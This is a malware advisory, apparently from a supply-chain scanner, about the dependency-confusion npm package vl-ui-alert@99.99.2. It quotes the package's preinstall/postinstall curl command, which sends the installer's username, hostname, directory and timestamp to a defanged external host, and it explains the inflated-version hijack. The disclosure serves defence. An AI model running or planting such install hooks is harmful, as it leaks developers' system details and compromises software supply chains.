vl-ui-alert@99.99.2
Malicious code in vl-ui-alert (npm)
Analysis
Dependency-confusion package vl-ui-alert@99.99.2 that beacons host metadata on install. The package contains no functional code (index.js is a single-line comment only). Both preinstall and postinstall hooks execute: curl -s "hxxps://178fx66q[.]instances[.]httpworkbench[.]com/depconf/?pkg=vl-ui-alert&u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)" > /dev/null || true. This exfiltrates the installer's username, hostname, current working directory, and timestamp to an external recon panel at 178fx66q[.]instances[.]httpworkbench[.]com. The /depconf/ path segment suggests the server is collecting dependency-confusion victims. The version is set to 99.99.2 to hijack npm version resolution over any legitimate version of vl-ui-alert.
- analyzed by
- Leitwacht
- first seen
- Jun 15, 2026, 08:58 PM
- analyzed
- Jun 15, 2026, 08:59 PM
Related advisories
- vl-ui-accessibility@99.99.1
- unico-check@9.9.9
- unico-android@9.9.9
- field-plus@99.99.1
- ugent_uws@10.9.11
- ogd-analytics@1.0.0
- nic-datagov@1.0.0
- ts-enum-helper@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.